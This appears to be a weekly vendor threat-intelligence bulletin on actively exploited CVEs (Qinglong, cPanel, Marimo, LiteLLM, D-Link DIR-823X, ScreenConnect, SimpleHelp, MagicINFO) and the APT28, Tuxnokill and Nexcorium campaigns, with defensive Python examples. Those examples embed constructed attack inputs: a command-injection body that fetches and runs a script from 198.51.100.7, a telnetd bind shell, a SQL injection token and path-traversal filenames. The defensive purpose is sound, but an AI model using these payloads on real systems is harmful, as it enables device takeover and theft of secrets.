Executive Summary
This week’s threat activity highlights a sharp intersection of rapid exploitation and lingering exposure, where both newly disclosed and aging vulnerabilities are being actively leveraged across enterprise and IoT environments.
CISA has expanded its KEV catalog with seven vulnerabilities spanning SimpleHelp, ConnectWise, Microsoft Windows, Samsung MagicINFO, D-Link routers, and Marimo, reflecting continued exploitation of widely deployed technologies. Parallel to this, active exploitation was observed in Qinglong, cPanel, and BerriAI's LiteLLM vulnerabilities, highlighting rapid attacker response following disclosure.
Malware campaigns further amplified the threat landscape, demonstrating rapid weaponization and operational deployment by threat actors. According to Akamai, APT28 leveraged a Microsoft vulnerability in an LNK-based campaign targeting Ukraine and EU entities, while separate activity involved exploitation of D-Link routers to deploy the Tuxnokill botnet and Fortinet-reported abuse of TBK DVR devices to distribute Nexcorium. Collectively, these developments illustrate a dual-front threat model in which enterprise software weaknesses and IoT exposures are exploited simultaneously, reinforcing the critical need for timely patching and continuous monitoring.
Key points:
- 7 vulnerabilities added to the CISA KEV catalog
- Active exploitations observed in Qinglong, cPanel and LiteLLM vulnerabilities
- APT28 exploited a recently patched Microsoft vulnerability
- Mirai-based Nexcorium and Tuxnokill botnets leveraged DVR and legacy router vulnerabilities
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2026-3965 - Protection Mechanism Failure vulnerability in Qinglong
A Protection Mechanism Failure vulnerability in Qinglong exposes protected administrative endpoints through an authentication bypass caused by a misconfigured rewrite rule that maps /open/ requests to /api/. The flaw affects versions 2.20.1 and earlier and can be chained with CVE-2026-4047 to achieve remote code execution, stemming from a mismatch between middleware authorization logic and Express.js routing behavior. According to Snyk, active exploitation began in early February, with attackers targeting exposed panels to deploy cryptominers. Post-exploitation activity involved modification of config.sh and execution of a malicious process named “.fullgc,” designed to mimic legitimate system activity while consuming significant CPU resources. The campaign leveraged remote infrastructure hosting multi-architecture payloads and demonstrated persistence across varied deployment environments. Initial mitigation attempts were insufficient, with an effective fix later introduced to address the authentication bypass, and users were advised to update to the latest patched version immediately.
CVE-2026-4047 - Protection Mechanism Failure vulnerability in Qinglong
A Protection Mechanism Failure vulnerability in Qinglong arises from inconsistent path handling, where authentication checks treat routes as case-sensitive (/api/) while the router processes them case-insensitively, allowing crafted requests such as /aPi/... to bypass authentication and access protected endpoints. The flaw affects versions 2.20.1 and earlier and can be chained with CVE-2026-3965 to achieve remote code execution, due to a mismatch between middleware authorization logic and Express.js routing behavior. According to Snyk, active exploitation was observed beginning in early February, targeting exposed Qinglong panels to deploy cryptominers. Post-exploitation activity involved modifying configuration files and executing a disguised process (“.fullgc”) to maintain persistence while consuming significant CPU resources. Initial mitigation attempts proved insufficient, with a comprehensive fix later implemented to properly enforce authentication checks. Users are strongly advised to update to the latest patched version to mitigate active exploitation.
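Both Qinglong issues come down to the authorization middleware and the router disagreeing about what the request path is. The following is an added example, not Qinglong's code: it reduces the two conditions described above to plain Python, assuming (as the write-up describes) that the middleware tests a literal, case-sensitive "/api/" prefix on the raw path, that a rewrite maps "/open/x" to "/api/x", and that the router matches case-insensitively, which is the Express default. The token value, the "/api/crons" route and the probe requests are constructed for the example.

```python
"""Model of the two Qinglong authorization gaps, reduced to plain Python.

Added example, not Qinglong's code. Assumptions: the auth middleware checks a
literal, case-sensitive '/api/' prefix on the raw request path; a rewrite maps
'/open/x' to '/api/x'; the router matches routes case-insensitively (Express
default). VALID_TOKEN stands in for the real session/JWT check.
"""
import posixpath
import re
from urllib.parse import unquote

PROTECTED_PREFIX = "/api/"
VALID_TOKEN = "constructed-panel-token"   # assumption, not a real credential


def rewrite_open(path):
    """Hypothetical rewrite rule modelled on the one described for CVE-2026-3965."""
    if path.startswith("/open/"):
        return "/api/" + path[len("/open/"):]
    return path


def route_matches(path, route, case_sensitive):
    """Express matches case-insensitively unless 'case sensitive routing' is enabled."""
    return path == route if case_sensitive else path.lower() == route.lower()


def vulnerable_dispatch(path, token):
    """Auth check sees the raw path; rewrite and case-folding happen afterwards."""
    if path.startswith(PROTECTED_PREFIX) and token != VALID_TOKEN:
        return 401
    path = rewrite_open(path)
    if route_matches(path, "/api/crons", case_sensitive=False):
        return 200
    return 404


def canonical(path):
    """Decode, collapse slashes and dot segments, apply rewrites: the path the router will see."""
    p = unquote(path)
    p = re.sub(r"/+", "/", p)
    if not p.startswith("/"):
        p = "/" + p
    return rewrite_open(posixpath.normpath(p))


def fixed_dispatch(path, token):
    """Authorize on the canonical path and route case-sensitively, so both see the same string."""
    p = canonical(path)
    if p.startswith(PROTECTED_PREFIX) and token != VALID_TOKEN:
        return 401
    if route_matches(p, "/api/crons", case_sensitive=True):
        return 200
    return 404


# Constructed probes: the two bypass shapes plus an encoded dot-segment variant.
PROBES = ["/api/crons", "/aPi/crons", "/open/crons", "/api/%2e%2e/api/crons"]


def compare(probes=PROBES):
    """Status codes for unauthenticated requests under both dispatchers."""
    return {p: (vulnerable_dispatch(p, None), fixed_dispatch(p, None)) for p in probes}


if __name__ == "__main__":
    for probe, (vuln, fixed) in compare().items():
        print(f"{probe:28} vulnerable={vuln} fixed={fixed}")
```

The fix is not "lowercase everything"; it is that the string the authorization decision is made on must be the same string the router dispatches on, after every decode, rewrite and normalization step, and that the router then match strictly.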
CVE-2026-32202 - Protection Mechanism Failure vulnerability in Microsoft Windows
A Protection Mechanism Failure vulnerability in Microsoft Windows allows an unauthorized attacker to perform spoofing over a network due to incomplete enforcement of security controls within Windows Shell. The flaw creates gaps in how network-based resources and paths are validated, resulting in limited confidentiality impact through exposure of sensitive information while not affecting integrity or availability. According to Akamai, the issue stems from an incomplete patch for CVE-2026-21510, previously exploited by APT28 alongside CVE-2026-21513 in an LNK-based exploit chain. Although SmartScreen mitigated the initial remote code execution vector, automatic UNC path resolution in Windows Explorer still triggered SMB connections to attacker-controlled servers, exposing Net-NTLMv2 hashes without user interaction. This residual gap enabled a zero-click authentication coercion vector, facilitating credential theft even after partial remediation. Microsoft addressed the vulnerability in its April 2026 Patch Tuesday release, later updating the advisory to confirm active exploitation, and it has now been added to the CISA KEV catalog.
CVE-2026-41940 - Authentication Bypass vulnerability in cPanel
An Authentication Bypass vulnerability in cPanel affects multiple authentication paths, allowing unauthorized access to hosting accounts and potentially extending to server-wide control through cPanel's integration with WHM. The flaw impacts multiple supported version branches and stems from weaknesses in the authentication logic of cPanel's multi-tier architecture, which governs access to files, databases, and email services. Exploitation enables attackers to bypass access controls and compromise the management plane, posing significant risks to data integrity and infrastructure security. According to watchTowr Labs, which published a proof-of-concept, the vulnerability was exploited in the wild as a zero-day against a large share of internet-facing installations. Emergency patches were released across multiple versions, namely 11.136.0.5, 11.134.0.20, 11.132.0.29, 11.126.0.54, 11.118.0.63, and 11.110.0.97. Administrators are strongly advised to apply updates immediately using the /scripts/upcp --force command, as unsupported legacy versions remain highly exposed.
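Because the fix lands as a different build number on each branch, "am I patched?" is a per-branch comparison rather than a single version check. The following is an added example, not cPanel tooling: it takes the six fixed builds listed above and reports whether a given version string is patched, still vulnerable, or on a branch for which no fixed build is listed. The version file location is an assumption.

```python
"""Check a cPanel & WHM version string against the CVE-2026-41940 fixed builds.

Added example, not cPanel's tooling. FIXED holds the builds named in the
advisory summary above; the version file path is an assumption.
"""
import re

# branch (second version component) -> first build that carries the fix
FIXED = {
    136: (11, 136, 0, 5),
    134: (11, 134, 0, 20),
    132: (11, 132, 0, 29),
    126: (11, 126, 0, 54),
    118: (11, 118, 0, 63),
    110: (11, 110, 0, 97),
}


def parse_version(text):
    """'11.136.0.5\\n' -> (11, 136, 0, 5); raises on anything that is not four integers."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\.(\d+)\s*", text)
    if not m:
        raise ValueError(f"unrecognised cPanel version: {text!r}")
    return tuple(int(x) for x in m.groups())


def assess(version_text):
    """Return 'patched', 'vulnerable' or 'no-fix-listed' for this branch."""
    v = parse_version(version_text)
    fixed = FIXED.get(v[1])
    if fixed is None:
        # Branch not in the emergency release list: treat as exposed until proven otherwise.
        return "no-fix-listed"
    return "patched" if v >= fixed else "vulnerable"


def assess_host(version_file="/usr/local/cpanel/version"):
    """Read the installed version from disk (path is an assumption) and assess it."""
    with open(version_file, encoding="ascii") as fh:
        return assess(fh.read())


if __name__ == "__main__":
    import sys
    print(assess(sys.argv[1]) if len(sys.argv) > 1 else assess_host())
```

Tuple comparison makes the check exact: 11.134.0.20 is patched, 11.134.0.19 is not, and 11.102.x gets no verdict because no fixed build exists for it, which is precisely the "unsupported legacy versions remain exposed" case.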
CVE-2026-39987 - Remote Code Execution vulnerability in Marimo
A Pre-Authentication Remote Code Execution vulnerability in Marimo enables unauthenticated attackers to obtain a full pseudo-terminal (PTY) shell and execute arbitrary system commands. The flaw affects versions prior to 0.23.0 and resides in the /terminal/ws WebSocket endpoint, where missing authentication checks allow direct access to an interactive shell with the privileges of the Marimo process. Exploitation requires minimal effort, as attackers can simply establish a WebSocket connection without crafting complex payloads. Observed activity showed rapid weaponization, including proof-of-concept validation, filesystem reconnaissance, and credential harvesting from sensitive files such as .env and SSH keys within minutes of access. The vulnerability underscores the risks associated with exposing development tools in internet-facing environments. The issue was remediated in version 0.23.0, with active exploitation observed shortly after disclosure, and has now been added to the CISA KEV catalog.
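The defect in the Marimo case is where the authentication decision sits: a terminal endpoint has to reject during the WebSocket handshake, before anything allocates a PTY. The following is an added example, not marimo's code: a framework-free ASGI handler that models the fix for a /terminal/ws-style endpoint, with an in-memory client to drive it. The token source (Authorization header or access_token query parameter), the token value and the close code are assumptions.

```python
"""Gate an ASGI websocket endpoint on a bearer token before accepting the upgrade.

Added example, not marimo's code. It models the fix for a /terminal/ws-style
endpoint: decide during the handshake, before any shell is spawned. Token
source (Authorization header or access_token query parameter), EXPECTED_TOKEN
and the 1008 close code are assumptions.
"""
import asyncio
import hmac
from urllib.parse import parse_qs

EXPECTED_TOKEN = "constructed-example-token"   # assumption: a real server loads this from config


def token_from_scope(scope):
    """Pull a bearer token from the handshake request; None if absent."""
    headers = {k.decode().lower(): v.decode() for k, v in scope.get("headers", [])}
    auth = headers.get("authorization", "")
    if auth.lower().startswith("bearer "):
        return auth[7:].strip()
    qs = parse_qs(scope.get("query_string", b"").decode())
    return qs.get("access_token", [None])[0]


def is_authorized(scope, expected=EXPECTED_TOKEN):
    token = token_from_scope(scope)
    return token is not None and hmac.compare_digest(token, expected)


async def terminal_ws(scope, receive, send):
    """ASGI handler: only an authorized client reaches the point where a PTY would start."""
    if scope["type"] != "websocket":
        return
    event = await receive()                      # the client's 'websocket.connect'
    if event["type"] != "websocket.connect":
        return
    if not is_authorized(scope):
        # No 'accept' is ever sent, so no PTY is ever allocated; 1008 = policy violation.
        await send({"type": "websocket.close", "code": 1008})
        return
    await send({"type": "websocket.accept"})
    # A real handler would spawn the PTY and bridge frames here; omitted.
    await send({"type": "websocket.send", "text": "shell ready"})


def make_scope(path="/terminal/ws", headers=(), query=b""):
    """Build a minimal ASGI websocket scope (constructed client request)."""
    return {"type": "websocket", "path": path,
            "headers": [(k.encode(), v.encode()) for k, v in headers],
            "query_string": query}


def handshake(scope):
    """Drive the handler with an in-memory client and return the events it sent."""
    sent = []

    async def receive():
        return {"type": "websocket.connect"}

    async def send(message):
        sent.append(message)

    asyncio.run(terminal_ws(scope, receive, send))
    return sent


if __name__ == "__main__":
    print("no token   ->", handshake(make_scope()))
    print("good token ->", handshake(make_scope(headers=[("Authorization", "Bearer " + EXPECTED_TOKEN)])))
```

The comparison uses hmac.compare_digest rather than == so the rejection path does not leak timing, and the check reads only the handshake request, so an unauthenticated client never gets past "connect".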
CVE-2026-42208 - Pre-Authentication SQL Injection vulnerability in LiteLLM
A Pre-Authentication SQL Injection vulnerability in BerriAI's LiteLLM allows unauthenticated attackers to read sensitive data from the proxy’s underlying database in versions prior to 1.83.7. The flaw originates from improper handling of the Authorization: Bearer header, where lack of input sanitization enables injection of arbitrary SQL queries into the backend PostgreSQL database. According to Sysdig, attackers leveraged this weakness to execute crafted SELECT statements without valid credentials, performing targeted enumeration of high-value tables containing virtual API keys, provider credentials, and environment configurations. The vulnerability was added to the GitHub Advisory Database on April 24, 2026, with active exploitation observed within 36 hours, demonstrating rapid weaponization and attacker familiarity with LiteLLM’s schema. The availability of a public proof-of-concept further increases the risk of widespread exploitation, making immediate remediation critical. Organizations are strongly advised to upgrade to the patched release, version 1.83.7-stable, to mitigate exposure.
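The shape of the LiteLLM bug, a request header spliced into a key-lookup query, is worth seeing next to its parameterized form. The following is an added example and is not LiteLLM's code: it uses sqlite3 in place of PostgreSQL so it runs offline, and the table and column names are constructed for the example rather than taken from LiteLLM's schema. It also includes a simple header check of the kind a proxy or WAF can apply in front of any such endpoint.

```python
"""Bearer-token lookup: string-built SQL beside the parameterized form.

Added example, not LiteLLM's code. sqlite3 stands in for PostgreSQL; the
tables, columns and rows are constructed and are not LiteLLM's schema.
"""
import re
import sqlite3


def setup():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE virtual_keys (token TEXT, team TEXT, spend REAL);
        CREATE TABLE provider_secrets (name TEXT, value TEXT);
        INSERT INTO virtual_keys VALUES ('sk-abc123', 'research', 4.2);
        INSERT INTO provider_secrets VALUES ('OPENAI_API_KEY', 'constructed-secret');
    """)
    return db


def extract_bearer(headers):
    auth = headers.get("Authorization", "")
    return auth[len("Bearer "):] if auth.startswith("Bearer ") else None


def lookup_vulnerable(db, headers):
    """The header value lands inside the statement text: the database sees attacker SQL."""
    token = extract_bearer(headers)
    sql = f"SELECT token, team FROM virtual_keys WHERE token = '{token}'"
    return db.execute(sql).fetchall()


def lookup_fixed(db, headers):
    """Bound parameter: the token is data, whatever characters it contains."""
    token = extract_bearer(headers)
    if token is None:
        return []
    return db.execute(
        "SELECT token, team FROM virtual_keys WHERE token = ?", (token,)
    ).fetchall()


# Constructed attacker token: a UNION that pulls a second table through the same query.
INJECTED = "' UNION SELECT name, value FROM provider_secrets --"


def looks_injected(token):
    """Cheap front-door check: real keys never contain quotes, comments or SQL keywords."""
    return re.search(r"['\";]|--|/\*|\b(select|union|or|and)\b", token, re.I) is not None


def demo():
    db = setup()
    good = {"Authorization": "Bearer sk-abc123"}
    evil = {"Authorization": "Bearer " + INJECTED}
    return {
        "vulnerable_good": lookup_vulnerable(db, good),
        "vulnerable_evil": lookup_vulnerable(db, evil),
        "fixed_good": lookup_fixed(db, good),
        "fixed_evil": lookup_fixed(db, evil),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:16} {rows}")
```

With the injected header the vulnerable lookup returns the provider secret instead of a key row, which is exactly the "enumerate high-value tables" behaviour reported above; the parameterized lookup returns nothing because no key literally equals that string. The regex check is a detection aid only, not a substitute for the bound parameter.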
CVE-2025-29635 - Command Injection vulnerability in D-Link DIR-823X
A Command Injection vulnerability in D-Link DIR-823X allows an authorized attacker to execute arbitrary commands via crafted POST requests to the /goform/set_prohibiting endpoint in firmware versions 240126 and 24082. The flaw arises from improper input handling where attacker-controlled data from the macaddr parameter is passed through snprintf into a command buffer and executed via a system() call, enabling remote code execution. Although D-Link confirmed that affected devices reached End-of-Life (EOL) and End-of-Support (EOS) status in September 2025, recent investigations by Akamai revealed active exploitation in March 2026 targeting these legacy routers. Post-exploitation activity involved deployment of the Tuxnokill botnet, a Mirai-derived payload delivered via shell scripts, featuring XOR-encoded configuration, multi-architecture support, and command-and-control communication over port 44300. Despite the product’s EOL status, continued exploitation and emergence of Tuxnokill highlight persistent risks in unpatched IoT ecosystems, leading to its inclusion in the CISA KEV catalog.
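The snprintf-into-system() pattern is easy to reason about once you look at what the shell receives. The following is an added example, not D-Link firmware (which is C): it models the handler shape described above in Python, tokenizes the resulting command the way a POSIX shell would to show where the injected command begins, and pairs it with a handler that validates the parameter against the MAC grammar and never involves a shell. The command template and the request bodies are constructed; nothing here executes anything.

```python
"""Model of the set_prohibiting command injection and a strict input gate.

Added example, not D-Link firmware. The iptables template and the POST bodies
are constructed; shell_words() only tokenizes, it never runs a command.
"""
import re
import shlex
from urllib.parse import parse_qs

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}$")
CONTROL_OPERATORS = {";", "|", "||", "&", "&&", "(", ")"}


def shell_words(cmd):
    """Tokenize like a POSIX shell, with control operators as their own tokens."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def handle_vulnerable(body):
    """snprintf(buf, ..., "... %s ...", macaddr); system(buf);  -> the words the shell would see."""
    mac = parse_qs(body).get("macaddr", [""])[0]
    cmd = f"iptables -A FORWARD -m mac --mac-source {mac} -j DROP"   # constructed template
    return shell_words(cmd)


def is_injected(tokens):
    """A second command is present if any control operator or substitution survives tokenizing."""
    return any(t in CONTROL_OPERATORS or "`" in t or "$(" in t for t in tokens)


def handle_fixed(body):
    """Validate against the MAC grammar, then build argv; no shell is ever involved."""
    mac = parse_qs(body).get("macaddr", [""])[0]
    if not MAC_RE.fullmatch(mac):
        return 400, None
    argv = ["iptables", "-A", "FORWARD", "-m", "mac", "--mac-source", mac, "-j", "DROP"]
    return 200, argv   # a real handler would subprocess.run(argv) with shell=False


# Constructed request bodies: one benign, two carrying a second command.
SAMPLE_BODIES = [
    "macaddr=00:11:22:33:44:55",
    "macaddr=00:11:22:33:44:55;wget http://198.51.100.7/tux.sh -O /tmp/t;sh /tmp/t",
    "macaddr=00:11:22:33:44:55|/bin/busybox telnetd -p 4444",
]


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        words = handle_vulnerable(body)
        print(f"injected={is_injected(words)!s:5} fixed={handle_fixed(body)[0]}  {words}")
```

The tokenized view makes the detection rule obvious for anyone writing an IDS signature or a honeypot classifier: a legitimate macaddr value is six hex pairs and nothing else, so any request whose macaddr contains a shell operator is an exploit attempt regardless of the payload that follows.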
CVE-2024-1708 - Path Traversal vulnerability in ConnectWise ScreenConnect
A Path Traversal vulnerability in ConnectWise ScreenConnect enables remote code execution through a “Zip Slip” flaw in the extension handling mechanism, where improper validation in the ZipDirectory.ExtractToDirectory method allows crafted archive paths (e.g., ../../) to write files outside intended directories. Affected versions include 23.9.7 and prior, where execution occurs with SYSTEM-level privileges, allowing attackers to deploy web shells or overwrite critical files for full compromise. According to Huntress, the vulnerability serves as the payload delivery stage of the “SlashAndGrab” exploit chain alongside CVE-2024-1709, enabling immediate privileged access and fueling large-scale ransomware campaigns. Despite being disclosed and patched by ConnectWise in version 23.9.8 in February 2024, exploitation has persisted, with Microsoft reporting recent abuse by Storm-1175 to deploy Medusa ransomware, alongside historical use by groups such as Black Basta and Bl00dy. The vulnerability has now been added to the CISA KEV catalog reflecting sustained in-the-wild exploitation.
CVE-2024-7399 - Path Traversal vulnerability in Samsung MagicINFO 9 Server
A Path Traversal vulnerability in Samsung MagicINFO 9 Server allows unauthenticated attackers to write arbitrary files with system-level privileges via improper input validation in the /MagicInfo/servlet/SWUpdateFileUploader endpoint. Affected versions include those prior to 21.1050.0, where lack of authentication and file validation enables upload of malicious JSP files, leading to remote code execution. According to SSD Advisory, the flaw stems from insecure handling of the fileName parameter, which is directly used to construct file paths without sanitization. Although Samsung addressed the issue in August 2024 with version 21.1050, public disclosure of technical details and proof-of-concept in April 2025 led to rapid in-the-wild exploitation. Historical activity shows use of this vulnerability to deploy Mirai botnet variants, highlighting its value for large-scale compromise and propagation. Despite being nearly two years old, the vulnerability continues to pose a significant risk and has now been added to the CISA KEV catalog, reflecting sustained exploitation.
CVE-2024-57726 - Missing Authorization vulnerability in SimpleHelp
A Missing Authorization vulnerability in SimpleHelp allows low-privileged technicians to generate API keys with excessive permissions, enabling privilege escalation to full server administrator access in affected versions v5.5.7 and prior. According to Horizon3.ai, this weakness forms part of a broader set of flaws that can be chained to download arbitrary files, upload malicious payloads, and achieve complete server takeover, ultimately compromising all connected client endpoints. Sophos MDR observed real-world exploitation where attackers abused SimpleHelp as a trusted RMM tool to conduct reconnaissance, exfiltrate sensitive data, and deploy DragonForce ransomware in a double-extortion campaign. Despite patches released in versions 5.5.8, 5.4.10, and 5.3.9, exploitation has persisted, with Microsoft attributing recent abuse to Storm-1175 for Medusa ransomware deployment, alongside historical use for DragonForce ransomware and Sliver malware. The vulnerability has now been added to the CISA KEV catalog, confirming active in-the-wild exploitation.
CVE-2024-57728 - Path Traversal vulnerability in SimpleHelp
A Path Traversal vulnerability in SimpleHelp allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip) in affected versions v5.5.7 and prior. According to Horizon3.ai, this weakness forms part of a broader set of flaws that can be chained to download arbitrary files, upload malicious payloads, and achieve complete server takeover, ultimately compromising all connected client endpoints. Sophos MDR observed real-world exploitation where attackers abused SimpleHelp as a trusted RMM tool to conduct reconnaissance, exfiltrate sensitive data, and deploy DragonForce ransomware in a double-extortion campaign. Despite patches released in versions 5.5.8, 5.4.10, and 5.3.9, exploitation has persisted, with Microsoft attributing recent abuse to Storm-1175 for Medusa ransomware deployment, alongside historical use for DragonForce ransomware and Sliver malware. The vulnerability has now been added to the CISA KEV catalog, confirming active in-the-wild exploitation.
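The ScreenConnect Zip Slip (CVE-2024-1708), the SimpleHelp Zip Slip (CVE-2024-57728) and the MagicINFO fileName traversal (CVE-2024-7399) fail the same check: an untrusted name is joined onto a destination directory and the result is trusted. The following is an added example, not ScreenConnect's, SimpleHelp's or MagicINFO's code: one safe_target() helper that covers both a zip entry name and an upload filename, a two-pass zip extractor built on it, and a constructed archive carrying one benign and one traversal entry.

```python
"""Safe destination paths for zip entries and upload filenames.

Added example, not ScreenConnect's, SimpleHelp's or MagicINFO's code. The
same check covers a Zip Slip entry name and a traversal in an upload fileName
parameter: after normalisation the name must resolve inside the destination.
The archive contents are constructed.
"""
import io
import os
import posixpath
import zipfile


def unsafe_target(dest, name):
    """What a naive extractor or upload servlet does: join and trust the result."""
    return os.path.join(dest, name)


def safe_target(dest, name):
    """Return the resolved path for dest/name, or raise ValueError if it leaves dest."""
    if "\x00" in name or os.path.isabs(name) or name.startswith(("/", "\\")):
        raise ValueError(f"absolute or NUL-containing name rejected: {name!r}")
    # Treat backslashes as separators too: Windows-hosted extractors honour them.
    norm = posixpath.normpath(name.replace("\\", "/"))
    base = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(base, norm))
    # realpath also follows symlinks already present under dest, so a link
    # pointing outside cannot be used as a tunnel.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path traversal: {name!r} resolves to {target}")
    return target


def is_safe_name(dest, name):
    try:
        safe_target(dest, name)
        return True
    except ValueError:
        return False


def extract_zip_safely(zip_bytes, dest):
    """Validate every entry first, then write: one bad entry aborts with nothing on disk."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        targets = [(info, safe_target(dest, info.filename)) for info in zf.infolist()]
        written = []
        for info, target in targets:
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written


def build_zip(include_traversal):
    """Constructed extension archive; optionally with a Zip Slip entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension/manifest.xml", "<manifest/>")
        if include_traversal:
            zf.writestr("../../App_Web/shell.aspx", "<!-- constructed, inert -->")
    return buf.getvalue()


if __name__ == "__main__":
    import tempfile
    d = tempfile.mkdtemp()
    for n in ("extension/manifest.xml", "../../App_Web/shell.aspx", "..\\..\\webapps\\ROOT\\shell.jsp"):
        print(f"{n:34} safe={is_safe_name(d, n)}  naive={unsafe_target(d, n)}")
    try:
        extract_zip_safely(build_zip(True), d)
    except ValueError as e:
        print("rejected:", e)
```

Two details matter. A string prefix test on the naive join is not enough, because dest + "/../../x" does start with dest; the check has to run on the resolved path. And validation has to complete for the whole archive before the first write, otherwise an attacker orders a benign entry first and the traversal entry second and still gets a partial footprint.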
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analysed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
APT28 Exploitation of CVE-2026-21510 via LNK-Based Attack Chain
According to Akamai, APT28 exploited CVE-2026-21510 as part of a coordinated LNK-based attack chain targeting Ukraine and EU entities in December 2025. The campaign leveraged weaponized LNK files to bypass Microsoft Defender SmartScreen and execute attacker-controlled code hosted on remote servers. The exploit chain combined CVE-2026-21513 and CVE-2026-21510, enabling execution of malicious DLLs via UNC paths through Windows Shell namespace parsing. The vulnerability stemmed from improper input validation in the handling of Control Panel (CPL) objects, allowing unauthorized code execution during file parsing. Microsoft addressed these flaws in the February 2026 Patch Tuesday release; however, subsequent analysis revealed incomplete remediation, which later led to CVE-2026-32202.
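The residual risk described for CVE-2026-32202 above, and the UNC-path delivery in this APT28 chain, share one trigger: Explorer resolves a UNC host named in shortcut metadata on its own, and if that host is outside the enterprise the SMB client authenticates to it with NTLM. The following is an added example, not Akamai's or Microsoft's tooling: a classifier that takes shortcut target and icon fields already extracted from .lnk files and flags the ones whose UNC host is external. Which ranges and DNS suffixes count as internal is an assumption, as are the sample records.

```python
"""Flag shortcut (.lnk) fields whose UNC host lies outside the enterprise.

Added example, not Akamai's or Microsoft's tooling. Assumptions: RFC 1918,
loopback and link-local ranges, single-label names, and names under
INTERNAL_SUFFIXES are internal; everything else is external. The shortcut
records are constructed.
"""
import ipaddress
import re

INTERNAL_SUFFIXES = (".corp.example",)   # assumption: replace with your AD DNS suffixes
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]

# \\host\share\...  or the long form  \\?\UNC\host\share\...
UNC_RE = re.compile(r"^\\\\(?:\?\\UNC\\)?([^\\]+)\\", re.IGNORECASE)


def unc_host(target):
    """Host component of a UNC path, or None when the path is not UNC at all."""
    m = UNC_RE.match(target)
    if not m:
        return None
    # \\host@SSL@443\DavWWWRoot is the WebDAV form; still an NTLM-authenticated connection.
    return m.group(1).split("@")[0]


def is_external_host(host):
    host = host.rstrip(".").lower()
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        pass
    if "." not in host:               # single-label names resolve via AD DNS / NetBIOS
        return False
    return not host.endswith(INTERNAL_SUFFIXES)


def coercion_risk(target):
    """True when resolving this field would make the client authenticate to an external host."""
    host = unc_host(target)
    return host is not None and is_external_host(host)


# Constructed records: (shortcut name, target path, icon location), as a LNK parser would emit.
SAMPLE_SHORTCUTS = [
    ("report.lnk", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\shell32.dll"),
    ("invoice.lnk", r"\\203.0.113.10\share\view.cpl", r"\\203.0.113.10\share\icon.ico"),
    ("logon.lnk", r"\\fs01.corp.example\netlogon\script.cmd", ""),
]


def scan_shortcuts(records=SAMPLE_SHORTCUTS):
    """Names of shortcuts where any UNC field points at an external host."""
    return [name for name, *fields in records if any(coercion_risk(f) for f in fields if f)]


if __name__ == "__main__":
    print("flagged:", scan_shortcuts())
```

Blocking outbound TCP/445 at the perimeter and enabling the "Restrict NTLM: Outgoing NTLM traffic to remote servers" policy address the same exposure from the other side; the classifier is useful for triaging a mailbox or file-share sweep of .lnk files after the fact. Note that the documentation range 203.0.113.0/24 is used only as a stand-in for an arbitrary external address.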
Mirai-Based Tuxnokill botnet leveraging legacy router vulnerabilities
According to Akamai, threat actors were observed exploiting CVE-2025-29635, a command injection vulnerability in end-of-life D-Link DIR-823X routers, to deploy a Mirai botnet variant named “tuxnokill.” The activity was detected in early March 2026 through honeypot telemetry, where attackers used shell scripts to deliver and execute the botnet payload. The campaign also attempted to exploit additional vulnerabilities, including CVE-2023-1389 in TP-Link Archer AX21 devices and a remote code execution flaw in ZTE ZXV10 H108L routers. These coordinated attacks targeted unpatched and legacy IoT devices to recruit them into botnet infrastructure. Once compromised, devices were leveraged to support distributed denial-of-service (DDoS) operations. The campaign reflected the continued reuse of Mirai source code, enabling both sophisticated and low-skilled actors to participate in botnet activity. The findings highlighted the persistent risk posed by outdated IoT hardware and the growing scale of automated exploitation campaigns.
Mirai-Based Nexcorium Botnet Leveraging DVR and Router vulnerabilities
According to Fortinet, a recent campaign exploited CVE-2024-3721, a command injection vulnerability in TBK DVR devices, to deploy a multi-architecture Mirai variant named Nexcorium. The activity targeted TBK DVR-4104 and DVR-4216 systems, where attackers leveraged the flaw to execute a downloader script that fetched architecture-specific botnet payloads. Once executed, the malware established control over compromised devices and demonstrated typical Mirai-based capabilities, including XOR-encoded configuration handling, watchdog mechanisms, and DDoS modules. The campaign also incorporated CVE-2017-17215 to further propagate by targeting Huawei HG532 devices within networks. In addition, the malware used hard-coded credentials to perform Telnet brute-force attacks, enabling lateral movement and infection expansion. Successful compromise allowed attackers to establish persistence through cron jobs and systemd services while connecting to command-and-control infrastructure for launching UDP, TCP, and SMTP-based DDoS attacks. The malware further employed defense evasion techniques by deleting its initial payload after execution. The campaign reflected continued exploitation of known vulnerabilities and weak credentials to build scalable IoT botnets capable of sustained and widespread impact.
